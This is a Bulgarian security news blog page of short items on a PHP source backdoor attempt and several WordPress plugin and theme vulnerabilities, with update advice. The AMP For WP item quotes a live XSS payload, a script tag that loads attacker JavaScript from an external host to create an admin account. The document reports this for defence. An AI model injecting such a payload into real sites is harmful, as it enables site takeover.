wordpress

  • Как се прокарва уязвимост в PHP: или неуспешен (засега) опит за supply chain атака

    Опит за директно инжектиране на зловреден код в сорса на PHP е бил засечен и неутрализиран навреме от разработчици.

    Тактиката е интересна: хакерите са се опитали да прокарат промени в сорса в официалното Git репо на PHP – git.php.net под формата на мними корекции на тайпота. Те са били пушнати в хранилището php-src така, че да изглеждат подписани от  двамата основни създатели и разработчици на PHP – Попов и Лердорф.

    Целта: зловредните кодове са използвани за backdoor – задна вратичка в приложенията, написани на езика, която позволява отдалечен достъп.

    PHP е един от основните езици, които все още се използват масово в интернет. На него е написана WordPress – най-големият онлайн CMS, използван в около 30% от сайтовете онлайн. Езикът е с отворен код, което означава, че всеки може да допринесе за неговото развитие. Подобно на WordPress, той има голяма потребителска база, което означава, че успешното му компрометиране би засегнало широк кръг системи (supply chain атака).

    Инцидентът е дал повод на екипа по поддръжката на PHP да го премести за постоянно в GitHub, за да повиши сигурността на проекта.

    Разработчиците, които досега са имали достъп до хранилищата, трябва да се присъединят към групата PHP на GitHub.

  • WordPress има много предимства, но един недостатък: plugin-уязвимостите

    Последен ъпдейт на 5 ноември 2020 в 05:32 ч.

    Бърз преглед на публикуваните в нашия блог новини показва, че периодично (поне веднъж месечно от началото на 2020 г.) ви информираме за критична уязвимост в модули на WordPress, като ви приканваме да ги актуализирате незабавно. Хакерите се възползват от популярността на WordPress (над 35% от сайтовете използват платформата) и държат на мушка хилядите налични модули, които разширяват функционалностите й – засекат ли уязвимост, задължително я експлоатират.

    Критична уязвимост, открита в плъгина TI WooCommerce за WordPress, който има повече от 70 хил. активни инсталации, може да предостави на атакуващия пълен административен достъп, включително възможност за модифициране и управление на базата данни на сайта. Грешката е коригирана в последната версия (1.21.12) на TI WooCommerce.

    Това е само една от поредицата  нови уязвимости на WordPress плъгини и теми, разкрити само през първата половина на октомври 2020 г. (повече по темата може да откриете тук).

    Въпреки грешките на мащаба, предимствата на WordPress са много и безспорни. А най-важната препоръка как безпроблемно да се възползвате от тях е една, при това често отправяна:

    Използвайте двуфакторна автентикация за вход в страницата на WordPress – това може да ви помогне да запазите собствения си уебсайт защитен, дори при наличието на уязвим плъгин, който е компрометирал данните ви за вход. И, разбира се, инсталирайте най-актуалната версия на използваните от вас модули.

  • Над 30 хил. WooCommerce сайтове са уязвими на атаки заради модул за отстъпки

    Уязвимост в модула за управление на отстъпки Discount Rules for WooCommerce поставя под риск над 30 хил. сайта, които работят с него. Проблемът с модула е решен на 13 август, а авторите му препоръчват незабавен ъпдейт към версия 2.1.1. на модула.

    Discount Rules for WooCommerce позволява задаването на автоматизирани правила за отстъпки при поръчка на определени количества продукти, както и реализирането на други типове промоции. Решението е предназначено за WooCommerce – разширение за електронна търговия на WordPress.

    Уязвимостите в него са позволявали на атакуващите да придобият контрол върху засегнатите сайтове. Засечени са и опити за атаки предимно от IP адреса 45[.]140.167.17, който се е опитвал да инжектира заразени скриптове посредством уязвимостите.

    Прочетете повече по темата тук

     

    В рубриката Бързи новини подбираме водещи заглавия за вас и споделяме линкове към външни публикации. 

  • Две уязвимости в WordPress модула Page Builder by SiteOrigin засягат над 1 млн. сайта

    Две уязвимости в модула Page Builder by SiteOrigin за WordPress засягат над 1 млн. сайта.

    Както става ясно от името на модула, той е подобен на Elementor и WP Bakery Page Builder и помага на създателите на уебсайтове да оформят визията и съдържанието им. Откритите пропуски позволяват на атакуващите да „инжектират зловредни JavaScript кодове в страниците от сайта, както и да изпълняват зловредни кодове в браузъра на администраторите на засегнатите сайтове.“

    „Добрата новина“ е, че за да се задейства самата атака, администраторът трябва да кликне върху линк.

    Проблемите са отстранени във версия v. 2.10.16 на модула. Препоръчваме да го ъпдейтнете максимално бързо.

    Прочетете повече по темата тук

     

    В рубриката Бързи новини подбираме водещи заглавия за вас и споделяме линкове към външни публикации. 

  • Уязвимост в WordPress тема позволява неоторизиран достъп до сайтове

    Експлоатирана уязвимост в WordPress темата OneTone позволява кражба на сайтове от страна на хакери. Тя е открита от Sucuri, един от най-популярните модули за защита на най-популярната система за управление на съдържание (CMS) в света.

    Уязвимостта позволява cross-site scripting (XSS), с който атакуващият инжектира JavaScript код в настройките на темата. С него потребителите на сайта могат да бъдат пренасочени към други, зловредни копия – или изцяло различни страници. Хакерите могат да се възползват от уязвимостта включително и за да крадат сесии на администратори на сайта – като по този начин да се сдобият с неоторизиран достъп до администраторските панели на жертвите си.

    Прочетете повече по темата тук

     

    Междувременно, беше публикуван ъпдейт на WordPress – версия 5.4.1. Тя идва със 7 запушени уязвимости. Сред тях са няколко XSS  пробойни, позволяващи неоторизирано качване на файлове, редактиране на съдържание и др.

    Прочетете повече по темата тук

    В рубриката Бързи новини подбираме водещи заглавия за вас и споделяме линкове към външни публикации. 

  • Хакери се възползват от уязвимости в над 1 млн. WordPress сайта

    Последен ъпдейт на 4 май 2020 в 12:00 ч.

    Първите атаки срещу три WordPress модула – ThemeGrill Demo Importer, Profile Builder и Duplicator – вече са факт. Засегнатите, според WordFence, сайтове, работещи само с Duplicator, са повече от 1 млн.

    Ако използвате някоя от следните версии на трите модула, ъпдейтнете ги възможно най-скоро:

    • ThemeGrill Demo Importer (версии под 1.6.3) – бъгът в модула позволява не неавтентикирани потребители да се логнат в сайта като администратори и да изтрият цялата му база данни
    • Profile Builder free and Pro (версии под 3.1.1) – уязвимостта дава възможност за неавтентикирани потребители да се логнат в сайта като администратори
    • Duplicator (версии под 1.3.26) – бъгът в плъгина позволява свалянето на произволни файлове от засегнатите сайтове
    Прочетете повече по темата тук

     

    В рубриката Бързи новини подбираме водещи заглавия за вас и споделяме линкове към външни публикации. 

  • WordPress: Плюсове и минуси за бизнеса

    Последен ъпдейт на 14 август 2019 в 03:46 ч.

    Системите за управление на съдържанието – накратко CMS – се използват за създаване, организиране и споделена обработка на уеб-страници. Тяхното особено предимство е, че редакторите, поддържащи и вмъкващо ново съдържание, не се нуждаят от умения за програмиране. Те удобно могат да правят това и чрез графичния потребителски интерфейс.

    CMS-а с отворен код WordPress е най-популярната система, докато Joomla, Typo3, OpenCMS, DNN, Orchard & Magnolia са по-неразпространени. При такова разнообразие, изборът често е нелесен. Един от най-задаваните ни въпроси, е именно този: дали CMS-и като WordPress са подходящи за комерсиални решения в корпоративния бранш. 

    Кристоф Вендл, софтуерен разработчик и уебдизайнер в Iphos IT Solutions, отговаря на този въпрос с “да“. – “Но само ако WordPress отговаря на изискванията.  Иначе казано, човек трябва да разграничава и претегля ситуацията според зависи. Колегите от Iphos България са събрали няколко аргумента „за“ и „против“ използването на WordPress. Ето част от тях, а пълният текст прочетете тук.

    Аргументи „ЗА“ WordPres:

    Фактът, че WordPress е предпочитаната CMS-системата от големи преприятия от ранга като Coca-Cola или New York Times, може да говори само положително за нея. Ето някои от конкретните предимства, които WordPress носи при внедряване и експлоатацията й за компаниите:

    • Висока ефективност на разходите по имплементацията й
    • Кратки срокове за разработка, бърза възвръщаемост на инвестициите
    • Множество приставки / разширения
    • Удобство

    Аргументи „ПРОТИВ“ WordPress:

    Наред с плюсовете, както всяко нещо, WordPress носи със себе си и минуси, като някои от тях могат да са от решаващо значение за определени бизнеси. Тъй като определени недостатъци могат да доведат до нежелани ситуации едва след известно време, ние Ви съветваме да прецените решението си предварително и да потърсите съвет. Така намалявате вероятността да изгубите от инвестицията си и да се сблъскате с неблагоприятни ситуации, водещи до непредвидени разходи в бъдещ план:

    • Уязвимости в сигурността. Популярността на WordPress е както плюс, така и минус – пробойни в сигурността му биват откривани отново и отново. Това налага редовното му обновление като задължително изискване.
    • Някои важни за бизнеса функции са недостъпни в базисната инсталация. WordPress не винаги притежава основополагащи за предприятията функции като напр. Multisite-Management.
    • Макар и рядко, скъпа доработка

    Материалът е публикуван с любезното съдействие на Iphos България. Пълния текст четете тук.

  • Ъпдейтнете Abandoned Cart за WooCommerce сега

    Уязвимост в безплатната и платена версия на плъгина за WooCommerce Abandoned Cart позволява кражбата на администраторски акаунти в сайтовете, които го използват, съобщават от производителя му Tyche Softwares. Разкритата в средата на февруари пробойна е отстранена и препоръчваме на потребителите му да ъпдейтнат до най-новата версия. Към момента 42% от ползвателите са го направили, коментират от Tyche Softwares.

    По данни на ZDNet с безплатната версия на плъгина работят около 20 000 сайта.

    Как работи уязвимостта

    Засегнатите плъгини се казват Abandoned Cart Lite (безплатна версия) и Abandoned Cart Pro (платена версия).

    Според официалната информация от компанията, уязвимостта позволява на атакуващия да създаде нов потребител с име woouser и имейл в услугата Mailinator (конкретният адрес е [email protected]), който има администраторски права в засегнатия сайт.  Проблемът е открит от потребителка, която е съдействала и за отстраняването му. Подробна техническа информация за самата уязвимост не е предоставена публично от авторите на плъгина с уточнението, че те не искат да разкриват как се осъществяват такива зловредни действия.

    Публикации в други медии твърдят, че пробойната в плъгините се дължи на cross-site scripting (XSS) уязвимости. Добавката за WooCommerce (която е и сред най-популярните платформи за електронна търговия в България) позволява на администраторите на сайтовете да следят кои потребители са започнали да пазаруват, но не са завършили поръчките си. Търговците виждат списък с потребители и добавените от тях в кошницата продукти.

    Според Defiant security хакерите използват полетата в количката на магазина, за да добавят зловреден код в базата данни на сайта. В последствие, когато администраторът влезе, за да провери списъка с незавършени поръчки и стигне до компрометираната такава, кодът се изпълнява и дава администраторски права на хакерите и опитва да инсталира два бекдора.

    Първият работи с цел да създаде горе описания администраторски акаунт.

    Вторият създава списък с използваните от платформата WordPress плъгини на сайта, проследява кой е първият деактивиран от тях и подменят съдържанието му, без да го активират. Новият, заразен „плъгин“ позволява отдалечен достъп до сайта.

    Какво да направите

    1. Проверете списъка си с потребители и потърсете потребителското име Ако има такова, то най-вероятно сайтът ви е компрометиран. Ако имате плъгинг, с който записвате и следите потребителската активност в WordPress, проверете дали с този акаунт са осъществени логини и каква е била дейността му
    2. Ъпдейтнете плъгина си до най-новата версия, за да елиминирате пробойната
  • WPML хакнат от бивш служител

    Един от най-популярните WordPress плъгини за мултиезичност WPML е бил компрометиран от бивш служител. Това става ясно от имейл, разпратен до потребителите на компанията (които са над 600,000 души, според официалния ѝ сайт). В официалното съобщение се казва, че бившият служител е оставил backdoor, преди да напусне компанията. С него той е успял да:

    • Копира имена и мейли на клиенти на WPML
    • Разпратил е мейли до тях
    • Спрял е страницата за поръчка на WPML и е публикувал фалшив блог пост от името на компанията

    Прочетете и: Четири начина служителите да се превърнат в заплаха за бизнеса ви

    WPML хакнат от бивш служител

    Разпратеното фалшиво съобщение е от мним потребител, който твърди, че WPML има „смешни уязвимости в сигурността си, които въпреки всички ъпдейти, позволи два от най-важните ми сайта да бъдат хакнати“, както и че „WPML позволи достъпа до лична информация за хора, които имат минимални способности да програмират.“

    Скрийншот от мейла може да видите по-долу:

    В официалното съобщение на WPML се казва още, че самият плъгин не е компрометиран, а атакуващият не е модифицирал кода му. Не е компрометирана и финансова информация. Има вероятност обаче акаунтите на потребителите да са компрометирани, тъй като атакуващият се е сдобил с имена и имейли – а съветът на компанията към засегнатите е да сменят паролите си.

    WPML е плъгин, който позволява на потребителите да създават сайтове на повече от един език на WordPress.

  • Уязвимост в AMP For WP се експлоатира и позволява превземане на сайтове

    Уязвимост в популярния плъгин AMP For WP се експлоатира активно, съобщава Wordfence. Приставката, която се използва от поне 100 хил. уебмастъри, позволява създаване на администраторски акаунти и превземане на сайтове.

    AMP For WP се използва от администраторите, за да оптимизират сайтовете си за мобилни устройства. На 17 ноември се появи предупреждение, че в плъгина има уязвимост. Тя позволява на регистриран в сайта потребител да създаде акаунт с администраторски права.

    Според Wordfence тази уязвимост вече се експлоатира с XSS атака, при която авторът се опитва да инжектира зловреден код в набелязания сайт. При повечето засечени атаки инжектираният код изглежда така: <script src=https://sslapis[.]com/assets/si/stat.js></script>

    Ако скриптът бъде зареден от браузъра на администратора, той създава нов потребител supportuuser с администраторски права, който е под контрола на авттора на скрипта.

    „Тази малуер кампания показва, че статичните XSS уязвимости все още са заплаха. Ако хакерът може да подкара зловреден код в браузъра на администратора на сайта, той може да използва цял набор от техники, с които да поеме контрола над сайта“, коментират от Wordfence.

    Преди по-малко от две седмици Wordfence съобщи за уязвимост в друг плъгин, която също позволява превземане на сайтове.

    Как да се предпазите

    Уязвимостта е отстранена във версия 0.9.97.20 на плъгина. Ако сайтът ви използва AMP For WP, обновете го до най-новата налична версия.

Back to top button